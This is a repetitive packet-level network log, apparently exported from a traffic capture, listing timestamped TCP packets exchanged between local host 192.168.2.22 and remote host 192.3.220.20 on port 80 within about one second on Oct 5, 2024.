            Oct 5, 2024 14:49:42.988511086 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.988537073 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.988549948 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.988620996 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.988634109 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.988682985 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.989171028 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.989182949 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.989201069 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.989242077 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.989255905 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.989268064 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.989279032 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.989289045 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.989312887 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.989335060 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.991993904 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.992013931 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.992024899 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.992053986 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.992075920 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.074404001 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074418068 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074429989 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074552059 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074562073 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074573040 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074579000 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.074579000 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.074584961 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074631929 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.074631929 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.074631929 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.074734926 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074803114 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.074837923 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074848890 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074858904 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074870110 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074881077 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074887991 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.074901104 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074903011 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.074913025 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074923992 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074923992 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.074934959 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074940920 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.074947119 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074959040 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074969053 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.074971914 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.074980974 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.075006008 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.075022936 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.075170994 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.075192928 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.075202942 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.075220108 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.075253010 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.075419903 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.075431108 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.075443029 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.075454950 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.075478077 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.075493097 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.075592041 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.075603008 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.075613976 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.075624943 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.075637102 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.075648069 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.075660944 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.075681925 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.076100111 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.076189995 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.076189995 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.076201916 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.076209068 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.076232910 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.076371908 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.076404095 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.076415062 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.076426029 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.076436996 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.076451063 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.076469898 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.076668978 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.076680899 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.076688051 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.076693058 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.076704979 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.076724052 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.076739073 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.077008963 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.077068090 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.119539976 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.119590044 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.119601965 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.119714022 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.119714022 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.160645008 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.160671949 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.160682917 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.160695076 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.160727978 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.160763979 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.160774946 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.160788059 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.160830975 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.160913944 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.160926104 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.160937071 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.160967112 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.160979986 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.160984993 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.161050081 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.161075115 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161086082 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161098003 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161128998 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.161140919 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.161155939 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161170006 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161211014 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.161233902 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161359072 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.161374092 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161396027 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161406994 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161418915 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.161439896 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.161453009 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.161477089 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161489964 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161526918 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.161617041 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161628008 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161638975 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161650896 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161665916 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161665916 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.161689043 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.161712885 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.161716938 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.161763906 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.162030935 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162087917 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162091017 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.162098885 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162139893 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.162157059 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162168026 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162179947 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162206888 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.162220955 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.162309885 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162322998 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162333012 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162344933 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162369013 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.162381887 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.162481070 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162492037 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162503958 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162529945 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.162543058 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.162832975 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162844896 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162857056 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.162893057 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.162906885 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.162992001 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.163003922 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.163016081 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.163045883 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.163059950 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.163122892 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.163134098 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.163144112 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.163156033 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.163167953 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.163181067 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.163183928 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.163208008 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.163237095 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.163305044 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.163316011 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.163327932 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.163361073 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.163372993 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.165684938 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.165739059 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.165744066 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.165751934 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.165791988 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.165818930 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.165832043 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.165844917 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.165874958 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.165888071 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.166395903 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166409016 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166420937 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166449070 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.166461945 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.166541100 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166554928 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166565895 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166590929 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166596889 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.166604996 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166614056 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.166616917 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166629076 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166635036 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.166642904 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166652918 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.166671991 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.166759968 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166773081 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166785002 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166795015 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.166819096 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.166831970 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.166877031 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.206170082 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.206248045 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.206302881 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.206332922 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.206332922 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.206337929 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.206366062 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.206372023 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.206417084 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.206438065 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.247668982 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.247731924 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.247737885 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.247777939 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.247802019 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.247817993 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.247827053 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.247853994 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.247865915 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.247905016 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.247909069 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.247956991 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.247963905 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.247997046 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248013020 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248033047 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248047113 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248064995 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248090982 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248097897 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248116970 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248150110 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248151064 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248184919 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248187065 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248202085 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248220921 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248254061 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248269081 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248287916 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248317957 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248341084 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248343945 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248380899 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248395920 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248418093 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248435020 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248440981 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248473883 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248507977 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248527050 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248538971 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248554945 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248573065 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248610973 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248620987 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248646021 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248676062 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248680115 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248687983 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248713970 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248749971 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248766899 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248785973 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248800039 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248826981 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248836994 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248862028 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248878002 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248897076 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248913050 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248930931 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248944044 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248964071 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.248977900 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.248996973 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249020100 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249032974 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249037981 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249067068 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249078989 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249099970 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249115944 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249134064 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249159098 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249170065 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249181986 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249265909 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249300003 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249329090 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249332905 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249346018 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249366045 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249377966 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249401093 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249413967 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249434948 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249449015 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249485016 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249491930 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249526978 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249545097 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249560118 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249573946 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249593019 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249605894 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249643087 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249684095 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249716997 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249741077 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249748945 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249771118 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249783993 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249795914 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249816895 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249836922 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249850035 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249866009 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249901056 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249916077 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249933958 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249948978 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.249969959 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.249980927 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.250003099 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.250017881 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.250030041 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.250046968 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.250053883 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:43.250065088 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:43.250072002 CEST4916380192.168.2.22192.3.220.20
